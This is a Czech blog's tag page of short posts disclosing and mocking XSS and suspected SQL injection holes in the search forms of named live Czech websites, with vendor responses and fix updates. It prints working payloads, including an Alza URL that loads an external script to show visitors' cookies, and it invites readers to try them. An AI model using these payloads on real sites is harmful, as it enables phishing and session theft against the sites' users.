Pravidelný občasník originálního humoru

Štítek: XSS RSS

Redesign: Aktuálně má novou podobu. Plochý, nevýrazný a plytký nedodělek

Aktuálně.cz - www.aktualne.cz - dnes spustilo novou podobu webu. Ten redesignům odolával řadu let, takže nová podoba sice je určitým krokem vpřed, ale zůstala pouze někde na počátku tolik potřebné cesty. Nové Aktuálně.cz je plochý, nevýrazný a plytký nedodělek typicky přeplácaný reklamou na úkor obsahu. Nechybí ani možnost XSS ve vyhledávání (vkládané HTML není ošetřeno po vsunutí do jednoho ze skriptů na stránce).

Aktuálně má novou podobu. Plochý, nevýrazný a plytký nedodělek

Paradoxně mobilní verze je podstatně sympatičtější a použitelnější, což už ale bohužel není pravda o tabletové podobě kde sázka na kostičky sice chvíli vypadá zajímavé, ale pak už se dostanete na klasickou webovou podobu článků, která se pro tablet hodí jen velmi málo. Takže tak nějak opět na půl cesty. A všemu tomu vévodí  zrušení loga. Pánové z Centrum Holding nechť se nezlobí, ale "A k t u á l n ě.cz" opravdu za logo nelze označit.

Svitavy.cz ovládli Andělé světla. Třeba tam najdete Aštara Šerana a vesmírné lidi

Je to tak, Aštar Šeran je teď na radnici ve Svitavách a ovládají to tam Andělé světla. Zázrak lásky? Samozřejmě až tak moc ne, prostě takové klasické XSS, které najdete (kde jinde) ve vyhledávání. A můžete se vyřádit. Díky za upoznrnění směřují k @kobitch

Nechť si Aštar trochu odpočine. Na webu CSSZ.cz taky najdete XSS

"Nechť si Aštar trochu odpočine," napsal mi čtenář tohoto blogu. A přiložil adresu http://tinyurl.com/bu9ppy4 ukazující jak snadno lze na www.cssz.cz využít neošetřeného vstupu z vyhledávání k XSS. Opět někdo nedělá to nejzákladnější co má a vyrobil web s bezpečnostní chybou v podobě klasického Cross Site Scripting.

DODATEK 14:00 - ČSSZ v tichosti bezpečnostní chybu opravili. Bohužel na dotaz tiskovému oddělení stále nikdo nereagoval. Ale treba časem odpoví, zejména na to, kdo je vlastně za tuhle začátečnickou chybu zodpovědný. 

Aštar Šeran zaútočil na Národní divadlo! Kdepak jenom SYMBIO nechalo díru?

Inu, www.narodni-divadlo.cz má nový design a jeho autore je @SYMBIO. Právě tam jsem se nechal zlákat oznámením "  is our new website for National Theatre. Check it on your devices!" a šel se podívat. Je to docela povedené, dokonce i responzivní. Ale zásadní problém tu je - prostě si můžete opěr pohrát s XSS. A kde jinde, než v políčku pro vyhledávání.

Mironet.cz a XSS ve vyhledávání. Ale nejspíš to bude ještě vážnější, než jenom tahle "maličkost"

Včerejší estráda okolo pochybné soutěže Mironetu na Facebooku (porušování Pravidel, zjevná nemožnost určit výherce, následné cenzurování komentářů soutěžících, "ban" soutěžících, lži, atd) měla ještě jeden zajímavý vedlejší efekt. Někdo v komentářích k zpackané soutěži opakovaně upozorňoval na klasickou bezpečnostní chybu na webu www.mironet.cz - v tuto chvíli je ještě stále aktivní. Zkusit můžete Aštara Šerana na Mironet.cz nebo si prostě jen tak zadejte nějaké HTML či skripting do políčka pro vyhledávání.

Pohled do zdrojového kódu vám ale připraví podstatnější překvapení. Součástí zdrojového kódu je zakomentovaný SQL kód, kde se zjevně také předává kompletní vyhledávací řetězec, aniž by byl jakkoliv ošetřen. A pokud byste se (čirou náhodou) vydali zkoušet SQL kód do políčka vyhledávání, tak je vcelku jasné, jak vážná tahle bezpečnostní chyba bude. Odpovědí totiž je "Vnitřní chyba serveru". Takže to vypadá na přítomnost jedné z nejvážnějších bezpečnostních chyb, SQL Injection - byť je samozřejmě možné, že vše mají ošetřené na úlovni uložených procedur. Ale s ohledem na úroveň amatérismu bych na to nesázel. 

  • <input type="text" class="SearchInput" style="line-height: 100%;" Id="EXPS" name="EXPS" value="<H1>test</H1>" onfocus="if (this.value == 'Hledaný výraz') { this.value = '';}" />
  • <!-- COMBODY strsql EXEC spGetCommoditySearchFullTextN @pnSearchedWordFullText = '"<H1>TEST</H1>*"',@pnSearchedWord='<H1>test</H1>',@pSearchType='',@nTimeSector=14, @nGroup=40,@nGroupOld=39,@bAlsoNotStored=0,@bCloseout=1,@sSort='',@bAsc = 0,@sAfterWord='',@sAfterWordFT='',@nPriceLow=0,@nPriceHigh= 0 ,@nCatId=0, @nProdId=0 --><br />
  • <br /><a href="javascript:history.go(-1);">jít zpět</a><br /><div class="StringReport">zkuste '<H1>test</H1>' nalézt :<br /><br /><table cellspacing='2' cellpadding='2' border='0' style="margin-left: 200px;">

Dodatek 10:24 - V komentářích pod tímto článkem se objevil jakýsi "Martin Štípek" co tvrdí, že je "programátor v Mironetu" a že "ihned opravil" XSS. To bylo asi tak před půl hodinou až hodinou. Upozornil jsem ho, že neopravil nic, že XSS nechal v dalších dvou místech. Výsledkem je, že svůj původní  příspěvek (a moji odpověď) smazal. A napsal znovu totéž. Opět je to ale špatně, protože stále jedno XSS zůstává.

Mall.cz a XSS ve vyhledávání, tam bych to opravdu příliš nečekal

Že se XSS (pro vysvětlení viz CROSS SITE SCRIPTING (XSS) - průvodce (nejenom) hackera) objevuje na nových webech, to mě většinou ani nepřekvapuje. Ale že je k nalezení na www.mall.cz mě docela překvapuje. Tam bych přeci jenom nečekal, že tuhle začátečnickou chybu nechají bez povšimnutí. Za upozornění díky @CZmiho - jeho "Senzace dne: Mall.cz podporuje vesmirné lidi!  #mall.cz #vesmirnilide" mě pobavila opravdu hodně (tweet zde).

A aby toho nebylo málo, pojďme počítat, kam všude se vyhledávaný výraz přenese ve 100% původní podobě. Je to docela k neuvěření. A ještě více k neuvěření to je poté co zjistíte, že jednou se ve výsledné stránce vložený řetězec objeví v ošetřené podobě.

  • <title>Výsledky vyhledávání – <h3>test</h3> | MALL.CZ</title>
  • <h1>Výsledky vyhledávání: „<h3>test</h3>“</h1>
  • <strong>Nalezeno 400 výsledků hledání</strong> pro výraz <strong>„<h3>test</h3>“</strong> (zobrazuji prvnich <strong>10 stran</strong>).
  • <td><input type="text" name="s" value="<h3>test</h3>" style="width: 575px; " /></td>
  • <a href="http://www.mall.cz/hledej?page=2&s=<h3>test</h3>">2</a>

Dodatek 9. července 15:10 - Mall.cz zjevně začal problém napravovat, takže už ho nenajdete ve většině případů. Kde ale stále zůstal je stránkování. 

Dodatek 10. července 9:00 - I přes dopisování si s Mall.cz stále XSS stále zůstává. 

Redesign: Portál veřejné správy

Tak portal.gov.cz má nový vzhled, kdybyste to náhodou nevěděli a byli na tom stejně jako já, že jste na tomhle podivném webu už několik let nebyli. Zato si teď můžete užít bezpečnostní chyby (XSS, Cross Site Scripting) ve vyhledávání. Případně žasnout nad tím, že to nemá vlastní vyhledávání (hledá to přes Google)

Dodatek 14:30 - v odpoledních hodinách se Portál Veřejné Správy poněkud odmlčel a nyní přesměrovává na Datové schránky. 

Redesign: Spir.cz a Netmonitor.cz (včetně nové XSS chyby)

www.spir.cz a www.netmonitor.cz mají nový vzhled webu. Absurdní vlastnost je, že se nedá klikat na titulky článků, ale musíte lovit "Prohlédnout celou zprávu" kdesi pod perexem. Od Macron Software (podepsané v patičce) bych čekal, že takto základní úlet nevytvoří. A přítomnost XSS přes vyhledávání (příklad) svědčí o tom, že to jako obvykle někdo ušil narychlo a bez přemýšlení.

Předaný HTML kód se  bez změny přenese do "Poslat mailem" :

<a href="forward?path=search/node/"><script>window.open('http://www.pooh.cz');</script>"><img src="/sites/all/themes/spir/images/forward.png" alt="Poslat mailem" /></a>&nbsp;

 

Redesign: Spir.cz a Netmonitor.cz (včetně nové XSS chyby)

Ostuda - web Sčítání 2011 má trapnou bezpečnostní chybu (aktualizováno)

Sčítání 2011 stojí miliardy korun, přesto nejsou provozovatelé www.scitani.cz schopni nabídnout webovou aplikací, která by neměla ty nejzákladnější bezpečnostní chyby. Formulář pro vyzvedávání sčítacího PDF umožňuje vkládat libovolný kód, který je poté poskytnut zpět prohlížeči - učebnicový příklad neošetřených vstupů a klasického XSS (Cross Site Scripting).

 

https://eform1.scitani.cz/eform/disp?frmName=
%22%3E%3CH1%3ENezabezpeceny%20web%20scitani.%20A%20tohle
%20stoji%20miliardy%20korun%3C/h1%3E

Jakkoliv na straně serveru dochází k mírným změnám (například všechny "O" jsou vyměněna za "0"), kreativitě se meze nekladou.


 

Aktualizace 9:51 - autoři webové aplikace doplnili základní obranu proti vkládaní HTML kódu přes prvek formuláře. Na vyjádření tiskového mluvčího prozatím stále čekám. Mimo jiné mě zajímalo, kdo je za tuto ostudu zodpovědný (rozumějte, kdo nezvládá ani základy programování webových aplikací)

Aktualizace 13:40 - Dnes je den zábavných telefonů. Zejména s novináři, kteří zavěšují zklamáni, že nikdo nehacknul Sčítání a že data Sčítání jsou touhle zábavnou chybičkou prakticky nedotčená. To asi není moc překvapující, novinařina potřebuje krev, pot a slzy.  Pozitivnějších je pár telefonátů s těmi, kdo mají tuhle věc na starosti - komunikují a chybu napravili. Což je potřeba ocenit, v řadě předchozích případů se zatloukalo a zatloukalo a zatloukalo.

Aktualizace 14:00 - Dorazilo vyjádření od tiskového mluvčího, ke kterému pouze dodám, že je korektní. A vážím si toho.

Vážený pane Dočekale,

děkuji Vám za upozornění na riziko XSS. Tento nedostatek nemohl vést žádným způbem, k ohrožení osobních dat, ale umožnil internetovému expertovi změnit zobrazení stránky v případě, že na ni někdo přišel z expertem rozšířeného odkazu.

Bezpečností systém okamžite pokus o útok na web odhalil a tento neodstatek byl po rychlé analýze odstraněn.

Pokud se ptáte na odpovědnost, tak ta je na jednom z našich dodavatelů, který nedostatek okamžitě napravil. Jde o  chybu, která nemohla ohrozit data, ale přiznávám, že byla zbytečná.

Velmi Vám děkuji, že jste nás na ni upozornil, vše řešíme co nejrychleji.

S přátelským pozdravem
Ondřej Kubala

Dodatek 16:50 - Volal místopředseda ČSÚ Drápal a poděkoval za oznámení XSS chybky. Po dlouhé době firma s adekvátní reakci na objevený problém. A k tomu už mohu dodat opravdu jenom to, že to se mi opravdu líbí

Redesign: Goodman.com

www.goodman.com hlásí redesign (viz tisková zpráva Skupina Goodman spustila nové internetové stránky se sekcemi pro jednotlivé země a vylepšila funkce webu) a to včetně české verze na www.goodman.com/cz. Českou verzi trochu kazí věci jako nadpis "Ceska Republika", celkový dojem kazí drobné problémy v Google Chrome a poněkud zvláštní představa, že nejširší okno prohlížeče je 1600 bodů (viz pozadí omezené na 1600 bodů). Do poněkud problematičtější kategorie patří přítomná možnost vstouvat HTML před vyhledávání - to je dost podstatné a hloupé omezení tvůrcu webu.

HTML Injection na YouTube.com - velký malér a ještě větší ostuda

Jedno je důležité, ignorujte média tvrdící něco o tom, že YouTube.com bylo hacknuto. Co je ale důležitější, pokud YouTube.com aktuálně používáte, můžete být hacknuti vy. HTML Injection totiž umožňuje do komentářů vkládat skripty a to je právě to, co se na YouTube včera dělo.

SQL injection je nejčastější bezpečnostní problém

SQL injection (vsouvání SQL kódu, Vyhledávače, SQL injection a ideální nástroje hackerů), XSS (Cross Site Scripting, CROSS SITE SCRIPTING - průvodce (nejenom) hackera) a autentikační/autorizační mechanismy jsou zodpovědné za více než polovinu  bezpečnostních problémů.  

Nejvíce chyb mezi prohlížeči měl Firefox (44%) následovaný Safari (35%) a IE (15%). Tohle a ještě řadu dalších užitečných věcí najdete v pravidelné zprávě od společnosti Cenzic (PDF) shrnující první polovinu roku 2009.

Web Vulnerabilities by Class (Cenzic)

ALZA.CZ - další web s XSS zranitelností

XSS (Cross Site Scripting) se stal čerstvě proslulý skrz neschopnost tvůrců webu www.cssd.cz odvést správně práci. XSS je ale hodně staré, takže ho najdete na řadě dalších webů. Na www.alza.cz můžete klasicky využít vyhledávací políčko pro hraní si. A v případě internetového obchodu je to obzvlášť nepříjemné, protože tahle zranitelnost je snadno zneužitelná pro phishing (rhybaření).

http://www.alza.cz/SearchAdvanced.asp?EXPS=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fwww.pooh.cz%2Fsecurity%2Fcss-test.js%3E&NameSearch=1&CodeSearch=1&PartNumber=1

Pokud budete mít povolené pop-up okna, zobrazí se vám nové okno s výpisem uživatelských cookies, které "získal" zcela cizí web - v tomto případě POOH.CZ. Znamenáte to ale i to, že pomocí vyhledávacího okénka je možné vsouvat libovolné skriptovací konstrukce - velmi účinný nástroj pro rhybaření a další útoky.

ALZA.CZ podporuje vajíčka ...

Bída české žurnalistiky - iHNed.cz, Novinky a iDnes jdou příkladem

Česká žurnalistika zase ukazuje, že není schopna ověřit zprávu a ochotně zveřejní cokoliv - zejména pokud je to dostatečně schopné vyvolávat zájem čtenářů. Ekonomické médium (iHNed.cz) se tak dostává na úroveň polo bulvárního iDnes.cz.

ČSSD nabízí XSS (Cross Site Scripting) přes HTML Injection ve vyhledávání

Na www.cssd.cz si můžete v praxi vyzkoušet jak se dá jejich nový a moderní web využít pro XSS (Cross Site Scripting). Vyhledávací okénko umožňuje zadávat libovolné HTML konstrukce a český podnikavý lid toho už využívá na Facebooku pro obohacování stránek o obsah, který by tam určitě nikdy nebyl.

Při trošce hraní navíc zjistíte, že web hlásí SQL chybu. Jak tuhle informaci dokážete využít, to už nechávám na vás.

Hal3000.cz v novém s bohatou nabídkou nebezpečných XSS příležitostí

100Mega Distribution se dnes pochlubila novými webovými stránkami www.hal3000.cz (na které se přerodily původní www.halnet.cz). Nechal jsem to uležet pár hodin, ale protože nikdo se neobtěžuje reagovat na upozornění, že tenhle web je děravý jako cedník, tak tuhle XSS lahůdku a hračku dávám v šanci všem ostatním. Vyhrajte si klasicky u vyhledávání (nejméně zábavné) nebo v online shopu (daleko zábavnější, protože své XSS můžete zamontovat do každého pole mimo e-mail¨).

Hal3000.cz jede na oXySHOP produktu (www.oxyshop.cz), čímž se také chlubí v patičce. Což holt asi také bude znamenat, že XSS je tam přítomno hlavně skrz tento produkt. Ano oXy Online nereaguje na informaci o chybě.

XSS je stále rozšířeným jevem na českém Internetu

Dopsal jsem článek pro zítřejší Lupu, který vysvětluje detailně jak funguje XSS (Cross Site Scripting). A pochopitelně mi nedalo a zkusil jsem jak jsou na tom některé weby.

ČSOB sice opravila PaySec.cz, ale poněkud zapomněli na hlavní www.csob.cz, kde můžete využít CSS. Problematický je i web České televize. A pak řada internetových obchodů, zejména v okamžiku, kdy využívají nějaký určitý e-shop od jednoho dodavatele. Všechny tyhle úlovky mají XSS ve vyhledávací funkci. Nepatří mezi nejtriválnější, ale je snadno použitelné.

Konkrétní a velmi přesné informace najdete zítra ráno na www.lupa.cz

Ranní dodatek - jak v ohlasech upozorňuje ehmo, XSS najdete i na webu časopisu, který se věnuje počítačové bezpečnostni. Nad touto skutečnosti rozum skutečně zůstává stáv němém úžasu. A poté co zjistí, že o tom správci webu už dlouho dobu vědí, tak k tomu lze už skutečně dodat jenom ... no comment ...

A poránu přidám ještě další ukázku - Mediar.cz nabízí XSS od té doby co Mediářem je. Včetně toho, že přidávání komentářů není nijak chráněno proti spambotům, takže Mediar.cz je líhní odkazů a textů pro všechny ViAgRy a jiné svinstvo.

PaySec není bezpečné bankovnictví. XSS na bankovním webu ČSOB je trestuhodná nedbalost

Řekněme si to rovnou a jasně. XSS na bankovním webu je v roce 2008 trestuhodná nedbalost. A přítomnost XSS na webu služby PaySec.cz je ostudná záležitost. Nevím jak dlouho vydrží mnou vložené HTML značky, včetně skritpů na PaySec.cz, ale prozatím si to můžete užít v praxi zde.

PaySec.cz není bezpečné bankovnictví

O XSS toho zjistíte (tradičně) vice v CROSS SITE SCRIPTING - průvodce (nejenom) hackera. A podrobnosti později.

Vyjádření ČSOB:

Zmiňovaná věc se podle všeho týká diskuzí na webu služby PaySec. V žádném případě neohrožuje finanční transakce ani bezpečnost celého systému. V tuto chvíli by již měla být opravena.
Hezky den a jeste jednou diky za upozorneni.
Marek Roll
tiskový mluvčí Poštovní spořitelny

Zajímavé XSS v Google Docs

Billy Rios objevil XSS vulnerabilitu v Google Docs, která je zajímavá jako ukázka toho, kde všude se může XSS (a různé bezpečnostní chyby) v dnešních "Web 2.0" aplikacích skrývat. Jde ale také o další příklad toho, že svěřovat případné firemní či důvěrné informace webovým aplikacím by vždy mělo předcházet důkladné zvážení možného důsledku "děravosti" takovýchto aplikací.

Objevené XSS (detaily) je obzvlášť nebezpečné i tím, že Google používá universální autentikaci v rámci všech Google.com domén. A právě přes XSS je možné unést (hijaack) session uživatele. Případný útočník se tak dostane nejenom k dokumentů v Google Docs, ale ke každé službě Google, kterou napadený uživatel používá. Chyba je svým způsobem hodně obskurní - využívá poněkud svévolného chování Internet Exploreru, který si nedělá příliš hlavu z toho, jaký Content-type vlastně dostává (Billy Rios nicméně upozorňuje, že podobně nekonzistentně se někdy chovají i další prohlížeče). Chyba využívá toho, že při exportu z Google Spreadsheets je Content-type nastaven na text/plain - pokud je ale do prvních buněk tabulky vložen HTML kód, bude Internet Explorerem zpracován jako HTML.

Při vložení “<HTML><body><script>alert(document.cookie)</script></body></HTML>” do buňky A1 to potom znamená, že se skript skutečně spustí - k útoku postačí poslat e-mailem odkaz na CSV podobu tabulky. Google chybu již opravil - v té souvislosti je ale zajímavé i to, že stejná chyba byla zneužitelná v Gmailu, kde byla opravená již dříve.

Stovky tisíc nebezpečných Flash souborů po celém světě

Adobe pilně pracuje na opravě, která by umožnila zbavit se stovek tisíc nebezpečných Flash (.swf) souborů,  které se vyskytují na webech po celém světě. Pochopitelně se tento problém týká i českých webů, nejde o nic specificky zahraničního. A taky nejde o nic nového - chyba v Flash souborech byla objevena v prosinci loňského roku. Adobe sice provedlo nějaké opravy v nástrojích pro vytváření Flashe, ale aby opravdu zmizely stovky tisíc nebezpečných souborů, musely by se znovu vytvořit všechny již vytvořené soubory.

O co vlastně jde? O XSS vulnerabilitu, která umožní prostřednictvím parametru Flash souboru dosáhnout klasického XSS - stačí pak (například) bankovní web obsahující Flash ... Objevitel chyby je Rich Cannings z Google, který poskytl velmi dobrou dokumentaci v podobě XSS Vulnerabilities in Common Shockwave Flash Files článku.  

Radiokomunikace mají nový (nebezpečný) web

České radiokomunikace mají nové webové stránky, www.radiokomunikace.cz nevypadá špatně z čistě osobního pohledu na design. Horší je to už s bezpečností. XSS nebo Cross Site Scripting je dostupné klasicky ve vyhledávání (zkuste si dokud to jde). Pokud chcete vědět více o XSS, zkuste CROSS SITE SCRIPTING - průvodce (nejenom) hackera.

Jak se uvádí v tiskové zprávě, nová internetová prezentace společnosti České Radiokomunikace vznikala ve spolupráci dvou agentur - design pochází z dílny společnosti Advertures s.r.o., technické zpracování měli na starosti programátoři z PragueBest, s.r.o. a odtud už vede stopa k problému v publikačním systém ePublisher. XCSS ve vyhledávání je tedy systémová chyba (viz například totéž u Fujifilm) publikačního systému ePublisher. Autoři byli upozornění.

Update po 13:00 - "Děkujeme za zprávu. Na opravě chyby již pracujeme," mi napsal Vladimir Simandl z PragueBest.

Update po 17:00 - Na webu radiokomunikací byla nasazena oprava. Před PragueBest ale stojí nelehký úkol, opravit weby všech svých zákazníků (zkoušet stále můžete například na www.xerox.cz).

Update po 19:00 - České radiokomunikace prozatím vůbec neodpověděly.

Praktická demonstrace nebezpečnosti XSS

NetCraft dnes upozornil na případ italské banky, jejíž web trpí XSS (vysvětlení co to Cross Site Scripting je, a další články na téma XSS). Vzpomněl jsem si na moji praktickou zkušenost s jednou z velkých institucí, u které jsem objevil právě XSS problémy. Tiskový mluvčí tehdy vyřešil celou situací tím, že vše zesměšnil a začal tvrdit, že XSS vůbec nebezpečné není.

Případ na který upozorňuje NetCraft je ale opravdu tou nejlepší ukázkou. Útočníci pochopitelně objevili XSS zneužitelnost webu a okamžitě toho využívají. A nutno podotknout, že právě a jenom díky XSS mohou využít rhybaření (phishing) přímo na pravé doméně banky a dokonce i s pravým SSL certifikátem. A pochopitelně na zdánlivě  bezpečném "https" připojení (ano, přítomnost https v URI je jedním z častých argumentů bank).


( strana 1 z 1 ) ( celkem článků: 23)